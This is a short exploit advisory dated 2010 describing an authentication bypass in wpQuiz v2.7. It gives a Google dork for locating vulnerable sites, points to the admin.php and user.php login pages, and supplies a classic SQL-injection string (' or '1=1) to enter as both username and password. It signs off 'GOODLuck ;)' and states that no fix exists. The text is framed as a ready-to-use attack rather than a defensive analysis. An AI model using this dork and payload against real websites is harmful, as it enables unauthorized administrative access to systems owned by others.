wpQuiz v2.7 Authentication Bypass Vulnerability

2010-09-21 09:15:23

Powered by wpQuiz - Auth bypass Vulnerability

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[+] Greatz : DaiMon
[~] Contact : [email protected]
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Script : wpQuiz
~Version : 2.7
~Download : http://webscripts.softpedia.com/script/Quizz/wpQuiz-41098.html
~Vulnerability Style : Auth bypass
~Google Dork : "Powered by wpQuiz" inurl:index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~

http://[Victim]/path/admin.php
[or user.php]

for bypass() bySQL

ID : ' or '1=1
PW : ' or '1=1

GOODLuck ;)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Fixes

No fixes

In order to submit a new fix you need to be registered.